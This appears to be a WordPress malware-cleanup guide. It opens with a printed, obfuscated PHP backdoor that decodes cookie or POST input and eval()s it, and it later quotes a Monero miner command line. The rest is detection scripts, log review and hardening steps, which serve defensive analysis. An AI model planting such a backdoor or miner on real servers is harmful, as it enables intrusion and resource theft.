$fb355e['l82418'][74].$fb355e['l82418'][94].$fb355e['l82418'][90].$fb355e['l82418'][53].$fb355e['l82418'][57].$fb355e['l82418'][11];$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]] = $fb355e['l82418'][97].$fb355e['l82418'][11].$fb355e['l82418'][97].$fb355e['l82418'][21].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][94];$fb355e[$fb355e['l82418'][74].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][56].$fb355e['l82418'][62].$fb355e['l82418'][18].$fb355e['l82418'][60].$fb355e['l82418'][63]] = $fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][97].$fb355e['l82418'][83].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][1].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][18].$fb355e['l82418'][86].$fb355e['l82418'][49].$fb355e['l82418'][83].$fb355e['l82418'][49].$fb355e['l82418'][68].$fb355e['l82418'][57].$fb355e['l82418'][18].$fb355e['l82418'][68]] = 
$fb355e['l82418'][78].$fb355e['l82418'][96].$fb355e['l82418'][78].$fb355e['l82418'][70].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][74].$fb355e['l82418'][97].$fb355e['l82418'][0].$fb355e['l82418'][11];$fb355e[$fb355e['l82418'][82].$fb355e['l82418'][86].$fb355e['l82418'][56].$fb355e['l82418'][86]] = $fb355e['l82418'][5].$fb355e['l82418'][11].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][97].$fb355e['l82418'][83].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][1].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][14].$fb355e['l82418'][49].$fb355e['l82418'][56].$fb355e['l82418'][56].$fb355e['l82418'][61].$fb355e['l82418'][61]] = $fb355e['l82418'][18].$fb355e['l82418'][83].$fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][67].$fb355e['l82418'][6].$fb355e['l82418'][21].$fb355e['l82418'][56].$fb355e['l82418'][57].$fb355e['l82418'][60].$fb355e['l82418'][0].$fb355e['l82418'][56].$fb355e['l82418'][57];$fb355e[$fb355e['l82418'][70].$fb355e['l82418'][68].$fb355e['l82418'][56].$fb355e['l82418'][49].$fb355e['l82418'][49].$fb355e['l82418'][54].$fb355e['l82418'][63].$fb355e['l82418'][49].$fb355e['l82418'][68]] = $fb355e['l82418'][74].$fb355e['l82418'][57].$fb355e['l82418'][94].$fb355e['l82418'][21].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][57].$fb355e['l82418'][21].$fb355e['l82418'][53].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][97].$fb355e['l82418'][94];$fb355e[$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][62].$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][45].$fb355e['l82418'][61].$fb355e['l82418'][67]] = 
$fb355e['l82418'][32].$fb355e['l82418'][49].$fb355e['l82418'][60].$fb355e['l82418'][54].$fb355e['l82418'][61].$fb355e['l82418'][6];$fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]] = $fb355e['l82418'][19].$fb355e['l82418'][23].$fb355e['l82418'][6].$fb355e['l82418'][61].$fb355e['l82418'][60];$fb355e[$fb355e['l82418'][0].$fb355e['l82418'][61].$fb355e['l82418'][61].$fb355e['l82418'][62]] = $_POST;$fb355e[$fb355e['l82418'][0].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][62]] = $_COOKIE;@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][90].$fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][21].$fb355e['l82418'][53].$fb355e['l82418'][0].$fb355e['l82418'][82], NULL);@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][53].$fb355e['l82418'][0].$fb355e['l82418'][82].$fb355e['l82418'][21].$fb355e['l82418'][57].$fb355e['l82418'][90].$fb355e['l82418'][90].$fb355e['l82418'][0].$fb355e['l82418'][90].$fb355e['l82418'][74], 0);@$fb355e[$fb355e['l82418'][42].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][83].$fb355e['l82418'][68].$fb355e['l82418'][60]]($fb355e['l82418'][39].$fb355e['l82418'][83].$fb355e['l82418'][14].$fb355e['l82418'][21].$fb355e['l82418'][57].$fb355e['l82418'][14].$fb355e['l82418'][57].$fb355e['l82418'][60].$fb355e['l82418'][5].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][0].$fb355e['l82418'][11].$fb355e['l82418'][21].$fb355e['l82418'][94].$fb355e['l82418'][97].$fb355e['l82418'][39].$fb355e['l82418'][57], 
0);@$fb355e[$fb355e['l82418'][70].$fb355e['l82418'][68].$fb355e['l82418'][56].$fb355e['l82418'][49].$fb355e['l82418'][49].$fb355e['l82418'][54].$fb355e['l82418'][63].$fb355e['l82418'][49].$fb355e['l82418'][68]](0);$u604d9662 = NULL;$r5401375 = NULL;$fb355e[$fb355e['l82418'][1].$fb355e['l82418'][18].$fb355e['l82418'][56].$fb355e['l82418'][57].$fb355e['l82418'][57].$fb355e['l82418'][6].$fb355e['l82418'][6].$fb355e['l82418'][18]] = $fb355e['l82418'][6].$fb355e['l82418'][54].$fb355e['l82418'][62].$fb355e['l82418'][56].$fb355e['l82418'][45].$fb355e['l82418'][18].$fb355e['l82418'][49].$fb355e['l82418'][60].$fb355e['l82418'][80].$fb355e['l82418'][56].$fb355e['l82418'][54].$fb355e['l82418'][23].$fb355e['l82418'][61].$fb355e['l82418'][80].$fb355e['l82418'][6].$fb355e['l82418'][6].$fb355e['l82418'][86].$fb355e['l82418'][67].$fb355e['l82418'][80].$fb355e['l82418'][83].$fb355e['l82418'][23].$fb355e['l82418'][45].$fb355e['l82418'][56].$fb355e['l82418'][80].$fb355e['l82418'][63].$fb355e['l82418'][61].$fb355e['l82418'][60].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][86].$fb355e['l82418'][45].$fb355e['l82418'][45].$fb355e['l82418'][68].$fb355e['l82418'][54];global $zbdee44b;function k547c($u604d9662, $c2fe6404){global $fb355e;$ue9100 = "";for ($f231=0; $f231<$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($u604d9662);){for ($s9716d=0; $s9716d<$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($c2fe6404) && $f231<$fb355e[$fb355e['l82418'][44].$fb355e['l82418'][63].$fb355e['l82418'][18].$fb355e['l82418'][62].$fb355e['l82418'][68].$fb355e['l82418'][62]]($u604d9662); $s9716d++, $f231++){$ue9100 .= 
$fb355e[$fb355e['l82418'][83].$fb355e['l82418'][56].$fb355e['l82418'][67].$fb355e['l82418'][86].$fb355e['l82418'][54]]($fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]]($u604d9662[$f231]) ^ $fb355e[$fb355e['l82418'][60].$fb355e['l82418'][83].$fb355e['l82418'][18].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][57]]($c2fe6404[$s9716d]));}}return $ue9100;}function w1c974($u604d9662, $c2fe6404){global $fb355e;global $zbdee44b;return $fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]]($fb355e[$fb355e['l82418'][78].$fb355e['l82418'][18].$fb355e['l82418'][61].$fb355e['l82418'][23].$fb355e['l82418'][54].$fb355e['l82418'][6].$fb355e['l82418'][23].$fb355e['l82418'][23]]($u604d9662, $zbdee44b), $c2fe6404);}foreach ($fb355e[$fb355e['l82418'][0].$fb355e['l82418'][6].$fb355e['l82418'][83].$fb355e['l82418'][62]] as $c2fe6404=>$f99f){$u604d9662 = $f99f;$r5401375 = $c2fe6404;}if (!$u604d9662){foreach ($fb355e[$fb355e['l82418'][0].$fb355e['l82418'][61].$fb355e['l82418'][61].$fb355e['l82418'][62]] as $c2fe6404=>$f99f){$u604d9662 = $f99f;$r5401375 = $c2fe6404;}}$u604d9662 = @$fb355e[$fb355e['l82418'][82].$fb355e['l82418'][86].$fb355e['l82418'][56].$fb355e['l82418'][86]]($fb355e[$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][62].$fb355e['l82418'][57].$fb355e['l82418'][83].$fb355e['l82418'][45].$fb355e['l82418'][61].$fb355e['l82418'][67]]($fb355e[$fb355e['l82418'][14].$fb355e['l82418'][49].$fb355e['l82418'][56].$fb355e['l82418'][56].$fb355e['l82418'][61].$fb355e['l82418'][61]]($u604d9662), $r5401375));if (isset($u604d9662[$fb355e['l82418'][83].$fb355e['l82418'][19]]) && $zbdee44b==$u604d9662[$fb355e['l82418'][83].$fb355e['l82418'][19]]){if ($u604d9662[$fb355e['l82418'][83]] == $fb355e['l82418'][97]){$f231 = 
Array($fb355e['l82418'][78].$fb355e['l82418'][70] => @$fb355e[$fb355e['l82418'][18].$fb355e['l82418'][86].$fb355e['l82418'][49].$fb355e['l82418'][83].$fb355e['l82418'][49].$fb355e['l82418'][68].$fb355e['l82418'][57].$fb355e['l82418'][18].$fb355e['l82418'][68]](),$fb355e['l82418'][74].$fb355e['l82418'][70] => $fb355e['l82418'][49].$fb355e['l82418'][92].$fb355e['l82418'][45].$fb355e['l82418'][80].$fb355e['l82418'][49],);echo @$fb355e[$fb355e['l82418'][74].$fb355e['l82418'][61].$fb355e['l82418'][57].$fb355e['l82418'][63].$fb355e['l82418'][56].$fb355e['l82418'][62].$fb355e['l82418'][18].$fb355e['l82418'][60].$fb355e['l82418'][63]]($f231);}elseif ($u604d9662[$fb355e['l82418'][83]] == $fb355e['l82418'][57]){eval/*b1e3a6fe*/($u604d9662[$fb355e['l82418'][56]]);}exit();} ?>
Since $GLOBALS is the common denominator of these samples, we recommend starting with the following command:
grep -r -i --include='*.php' '$GLOBALS' /var/www/wordpress/
The results will be numerous, because WordPress core itself reads $GLOBALS in many places, but this wide net lets you review every hit for obfuscated code: the suspicious files are the ones that copy $GLOBALS into a variable, or that start with a single very long line containing a dictionary string. Third-party scanners can automate these queries, but they are not as reliable as a manual review.
Don’t hesitate to contact us if the results are too numerous or if you have a doubt about some files!
View files modified in the last 24 hours
find /var/www/wordpress/ -mtime -1 -ls
The “-1” here means files modified less than 24 hours ago. find counts age in whole days, so “1” alone matches files modified between 24 and 48 hours ago, and “+1” matches files modified more than 48 hours ago. For finer granularity use -mmin (minutes). Keep in mind that an attacker can reset timestamps with touch, so an old modification date is not proof that a file is clean.
Once you’ve cleaned up, redo the following commands to make sure there’s nothing left:
Detect shells hidden in .ico files
grep -r -i --include='*.ico' 'preg_replace' /var/www/wordpress/
An icon is a binary image: readable PHP inside a .ico file (preg_replace, eval, a <?php tag) is a backdoor, and it is generally loaded by an injector like the one below. These files are often hidden, with a name starting with a dot.
Detect injectors
grep -r -i --include='*.php' '*/ @include' /var/www/wordpress/
The injector is a one-liner prepended to a legitimate file (index.php, wp-config.php, a theme’s functions.php): a comment followed by @include of the hidden .ico, usually with the path written as \x2f escapes so that it does not show up in a plain-text search.
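The following script is an added example (not code from the original article) that applies the indicators from the last four commands ($GLOBALS dictionary, PHP inside .ico files, "*/ @include" injectors, recently modified files) to a WordPress tree in one pass. It builds a small constructed tree of fake files so it can be run offline; on a server, point the functions at /var/www/wordpress/ instead. The file names, markers and the 24-hour default are assumptions chosen for the demonstration; it assumes POSIX sh with GNU or BSD grep and find.

```shell
#!/bin/sh
# Added example, not from the original article: one-pass triage of a WordPress
# tree with the indicators discussed above. Runs offline on a constructed tree.
set -e

# .php files that alias the $GLOBALS superglobal into a short variable, build a
# dictionary in it, or use ${"GLOBALS"}: the trick shared by the three samples.
# Legitimate core code reads $GLOBALS['wp_query'] etc., which this does not flag.
scan_globals_dict() {   # $1 = webroot
  grep -rlE --include='*.php' \
    '\$GLOBALS\[.[A-Za-z0-9_]+.\] *= *[Aa]rray\(\)|\$[{]"GLOBALS"[}]|\$[A-Za-z0-9_]+ *= *\$GLOBALS *;' \
    "$1" || :
}

# Icons are binary images: any PHP in a .ico file is a backdoor. find is used
# instead of --include so hidden files such as .a1b2c3.ico are covered too.
scan_php_in_icons() {   # $1 = webroot
  find "$1" -type f -name '*.ico' -exec grep -lE '<\?php|preg_replace|eval *\(' {} + || :
}

# Injectors: a comment immediately followed by @include of the hidden payload,
# usually prepended to a legitimate file (index.php, wp-config.php).
scan_injectors() {   # $1 = webroot
  grep -rlF --include='*.php' '*/ @include' "$1" || :
}

# Files modified in the last N minutes (default 24h). The cache directory churns
# constantly and is skipped. An attacker can reset mtimes with touch, so an old
# date is not proof of innocence.
recent_files() {   # $1 = webroot, $2 = minutes (default 1440)
  find "$1" -type f -mmin "-${2:-1440}" ! -path '*/cache/*' || :
}

# Constructed sample tree: only the textual markers, not real malware.
make_sample_tree() {
  d=$(mktemp -d)
  mkdir -p "$d/wp-includes" "$d/wp-content/uploads" "$d/wp-content/cache"
  # legitimate core-style code: reads from $GLOBALS, must not be flagged
  printf '<?php\n$wp_query = $GLOBALS["wp_query"];\n' > "$d/wp-includes/legit.php"
  # dropper: aliases $GLOBALS into a dictionary variable, as in the samples above
  printf '<?php $a1 = 840;$GLOBALS["v048a"] = Array();global $v048a;$v048a = $GLOBALS;\n' \
    > "$d/wp-includes/class-wp-hook.php"
  # injector prepended to an index.php, pointing at the fake icon via \x2f escapes
  printf '<?php\n/*a1b2c*/ @include "\\x2fwp-content\\x2fuploads\\x2ffavicon_d4c3.ico";\n' \
    > "$d/wp-content/uploads/index.php"
  # "icon" that is actually PHP
  printf '<?php @preg_replace("/.*/e", $_POST["c"], "");\n' > "$d/wp-content/uploads/favicon_d4c3.ico"
  # genuine (placeholder) icon and a cache file that should be ignored
  printf 'ICO placeholder\n' > "$d/favicon.ico"
  printf '<?php /* cached */\n' > "$d/wp-content/cache/page.php"
  echo "$d"
}

root=$(make_sample_tree)
for check in scan_globals_dict scan_php_in_icons scan_injectors recent_files; do
  printf '== %s ==\n' "$check"
  "$check" "$root"
done
rm -rf "$root"
```

On a real server replace the constructed tree with the web root, and read every hit by hand: the $GLOBALS pattern is deliberately narrower than the plain grep above, so a file it flags deserves attention, while a file it does not flag is not thereby clean.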
Detect a suspicious process
htop
htop displays the list of running processes on your server. Look for anything you do not recognize and kill it with F9. Below is an example of a suspicious process, a cryptocurrency miner (here cnrig mining Monero with the cryptonight algorithm: your server is mining for the attacker). Killing it is not enough: find what restarts it (the web user’s crontab, /etc/cron.d, a systemd unit, a PHP file that launches it), otherwise it will be back within minutes:
500 56885 198 0.1 69408 8028 ? Sl Sep23 5940:27 ./cnrig -a cryptonight --donate-level 1 --max-cpu-usage 50 -o xmr.pool.minergate.com:45700 -u [email protected] -p x --variant 1 -k
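Hunting by eye in htop does not scale to a busy server, so here is an added example (not code from the original article) that applies the indicators of that miner family to the text output of ps. The process listing below is constructed (pool hostnames under .invalid, a fake wallet, a miner disguised as kswapd0 in /tmp); the regex of indicators is an assumption based on the cnrig/XMRig command line shown above. It assumes POSIX sh, grep -E and awk; process_origin additionally assumes Linux /proc.

```shell
#!/bin/sh
# Added example, not from the original article: flag likely miners in a ps
# listing and show where a PID really runs from.
set -e

# Indicators of the XMRig/cnrig family: stratum pool URLs, the cryptonight and
# randomx algorithms, the --donate-level flag, pool hostnames and ports.
MINER_RE='stratum\+(tcp|ssl)://|cryptonight|randomx|--donate-level|[.]pool[.]|xmr[a-z0-9.-]*:[0-9]+|minergate'

# Reads "ps -eo pid,user,pcpu,etime,args" output on stdin; prints "pid user command"
# for every line that matches the indicators.
flag_miner_processes() {
  grep -iE "$MINER_RE" | awk '{ print $1, $2, $5 }' || :
}

# Where does a PID come from? Miners often run from /tmp or /dev/shm under a
# kernel-sounding name, and the binary is frequently deleted right after start
# (the exe link then ends in "(deleted)").
process_origin() {   # $1 = pid
  printf 'pid=%s exe=%s cwd=%s\n' "$1" \
    "$(readlink "/proc/$1/exe" 2>/dev/null || echo '?')" \
    "$(readlink "/proc/$1/cwd" 2>/dev/null || echo '?')"
}

# Constructed listing in the format of: ps -eo pid,user,pcpu,etime,args
sample_ps_output() {
cat <<'EOF'
  PID USER     %CPU     ELAPSED COMMAND
 1234 www-data  0.1    02:10:33 php-fpm: pool www
56885 www-data 198.0 12-03:22:07 ./cnrig -a cryptonight --donate-level 1 --max-cpu-usage 50 -o pool.example.invalid:45700 -u WALLET -p x --variant 1 -k
 4312 mysql     2.3 12-03:25:00 /usr/sbin/mysqld
  991 www-data  99.0    00:45:01 /tmp/.x/kswapd0 -o stratum+tcp://xmr.example.invalid:3333 -u WALLET
EOF
}

sample_ps_output | flag_miner_processes
process_origin $$
```

On a live server run ps -eo pid,user,pcpu,etime,args | flag_miner_processes, then process_origin on each PID before killing it, and look for the restart mechanism at the same time: crontab -l -u www-data, the files in /etc/cron.d and /var/spool/cron, and anything executable in /tmp, /dev/shm or /var/tmp.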
Check the server logs
In order to ensure that no one else has access to your server or that no suspicious requests are being made, you should analyze your server logs.
Analyze the latest SSH connections
To check who has connected to your SSH server lately, you can use the following commands:
last
cat /var/log/auth.log
On RHEL/CentOS the file is /var/log/secure, and on systemd-based distributions journalctl -u ssh (or sshd) shows the same events.
You can then find unauthorized access attempts and block the IP addresses in question.
Check the web server logs
Whether it’s Apache or Nginx, your web server should be logging. If it isn’t, fix the configuration before anything else. The access log records every request, not just errors: that is what you will need to inspect.
The logs are generally located in :
/var/log/
You can go to this folder and run:
ls -ltr
to list the logs with the most recently modified at the bottom, then check their content (access.log or access_log for requests, error.log or error_log for errors).
Also look for IPs that come back often and perform shady actions, such as POST requests to rogue .ico and .php files (a POST to a file under wp-content/uploads/ should never happen), then ban them with iptables:
iptables -I INPUT -s IPTOBAN -j DROP
Note that this rule is lost at reboot unless you save it (iptables-save), and that behind a CDN or reverse proxy the logged address is the proxy’s, not the attacker’s.
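The following is an added example (not code from the original article) of the log review described above: it ranks, from an Apache or Nginx combined-format access log, the IPs that POST to .ico files or to PHP files under wp-content/uploads/ or wp-includes/, then prints (without executing) the matching iptables rules. The log lines are constructed with documentation IP ranges; the choice of paths treated as suspicious is an assumption based on the article’s description. It assumes POSIX sh, awk and sort.

```shell
#!/bin/sh
# Added example, not from the original article: find the IPs driving an icon
# shell or a backdoored core file in an access log, and build the ban list.
set -e

# stdin: combined log lines -> "count ip path", most frequent first.
# Field 6 is the quoted method ("POST), field 7 the request path.
suspicious_posts() {
  awk '
    $6 == "\"POST" {
      p = $7; sub(/\?.*/, "", p)          # drop the query string
      if (p ~ /\.ico$/ || p ~ /^\/wp-(content\/uploads|includes)\/.*\.php$/)
        hits[$1 " " p]++
    }
    END { for (k in hits) print hits[k], k }' | sort -rn || :
}

# stdin: output of suspicious_posts -> one iptables DROP rule per distinct IP.
# Review the list before piping it into sh: a rule inserted with -I is live
# immediately and is lost at reboot unless saved (iptables-save).
ban_commands() {
  awk '!seen[$2]++ { printf "iptables -I INPUT -s %s -j DROP\n", $2 }'
}

# Constructed access log: one attacker driving an uploaded icon shell and a
# backdoored core file, plus ordinary traffic that must not be flagged.
sample_access_log() {
cat <<'EOF'
203.0.113.7 - - [23/Sep/2019:10:00:01 +0000] "POST /wp-content/uploads/2019/09/favicon_d4c3.ico HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Sep/2019:10:00:09 +0000] "POST /wp-content/uploads/2019/09/favicon_d4c3.ico HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Sep/2019:10:01:12 +0000] "POST /wp-includes/class-wp-hook.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
198.51.100.4 - - [23/Sep/2019:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [23/Sep/2019:10:02:05 +0000] "GET /wp-admin/ HTTP/1.1" 200 9012 "-" "Mozilla/5.0"
192.0.2.33 - - [23/Sep/2019:10:03:00 +0000] "GET /favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0"
192.0.2.33 - - [23/Sep/2019:10:03:20 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 60 "-" "Mozilla/5.0"
EOF
}

sample_access_log | suspicious_posts
sample_access_log | suspicious_posts | ban_commands
```

On a server, feed the real log (for example zcat /var/log/apache2/access.log*.gz | cat - /var/log/apache2/access.log | suspicious_posts). If the site sits behind Cloudflare or another proxy, field 1 is the proxy’s address: log the client IP from the forwarded header (CF-Connecting-IP or X-Forwarded-For) and adapt the field number, or you will end up banning your own CDN.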
What to do after a disinfection?
We can’t say it enough, so we’ll say it again: when you’re done cleaning up your site, remember to do these four small steps:
- Restart PHP (PHP-FPM, or the web server with mod_php) to flush OPcache, which may still hold compiled copies of the infected files
- Restart Redis (if installed on your server)
- Empty your WordPress cache (if you have one like WP Rocket)
- Empty your CDN cache (if you have one like Cloudflare)
With these four steps, you make sure that no cached copy of an infected PHP or .ico file survives and reinfects the site without you understanding why 😉
Finally, regenerate the WordPress salts and keys in wp-config.php (this invalidates every login cookie, including the attacker’s), change your SSH/FTP credentials and the database password, reset the passwords of all WordPress administrators, and delete any administrator account you do not recognize.
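Regenerating the salts by hand means editing eight define() lines without a typo. The script below is an added example (not code from the original article) that rotates them in place; it is written against a constructed wp-config.php so it runs offline, and on a server you would pass the real path (for example /var/www/wordpress/wp-config.php). The 64-character length and the character set are assumptions; it assumes POSIX sh, sed, tr and /dev/urandom.

```shell
#!/bin/sh
# Added example, not from the original article: rotate the eight WordPress
# authentication keys and salts in wp-config.php, keeping a backup outside
# the web root.
set -e

WP_SALT_KEYS='AUTH_KEY SECURE_AUTH_KEY LOGGED_IN_KEY NONCE_KEY AUTH_SALT SECURE_AUTH_SALT LOGGED_IN_SALT NONCE_SALT'

# 64 random printable characters. Single quote, slash, backslash and ampersand
# are excluded because they would break the PHP string or the sed replacement.
new_salt() {
  LC_ALL=C tr -dc 'A-Za-z0-9!@#%^*()_+=-' </dev/urandom | head -c 64
}

# $1 = path to wp-config.php. Prints the path of a mode-600 backup in the temp
# directory. Never leave a copy named *.bak in the web root: it would be served
# as plain text, with the database password in it.
rotate_wp_salts() {
  cfg=$1
  bak=$(mktemp) && cp "$cfg" "$bak"
  for key in $WP_SALT_KEYS; do
    salt=$(new_salt)
    sed "s/^\( *define( *'$key', *\)'[^']*'/\1'$salt'/" "$cfg" > "$cfg.tmp"
    cat "$cfg.tmp" > "$cfg" && rm -f "$cfg.tmp"   # cat keeps the file's owner and mode
  done
  echo "$bak"
}

# Value of one define() in a wp-config.php, to check the result.
wp_define_value() {   # $1 = constant name, $2 = path
  sed -n "s/^ *define( *'$1', *'\([^']*\)'.*/\1/p" "$2"
}

# Constructed wp-config.php with placeholder salts.
make_sample_config() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_PASSWORD', 'db-secret-unchanged' );
define( 'AUTH_KEY',         'old-auth-key' );
define( 'SECURE_AUTH_KEY',  'old-secure-auth-key' );
define( 'LOGGED_IN_KEY',    'old-logged-in-key' );
define( 'NONCE_KEY',        'old-nonce-key' );
define( 'AUTH_SALT',        'old-auth-salt' );
define( 'SECURE_AUTH_SALT', 'old-secure-auth-salt' );
define( 'LOGGED_IN_SALT',   'old-logged-in-salt' );
define( 'NONCE_SALT',       'old-nonce-salt' );
$table_prefix = 'wp_';
EOF
  echo "$f"
}

cfg=$(make_sample_config)
bak=$(rotate_wp_salts "$cfg")
grep -E "^ *define\( *'[A-Z_]+(KEY|SALT)'" "$cfg" || :
rm -f "$cfg" "$bak"
```

Delete the backup once the site is verified. Run the rotation last, after the cleanup and the cache flushes above, so that the session reset happens on a clean code base; the database password change that follows it has to be made both in MySQL and in the same wp-config.php.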
Secure your site and your server more
If you have not managed to clean up your server or your site, or if you have any doubt about the files you have found with the commands above, call on our services. Our experts will analyze them for you and help you clean up your site.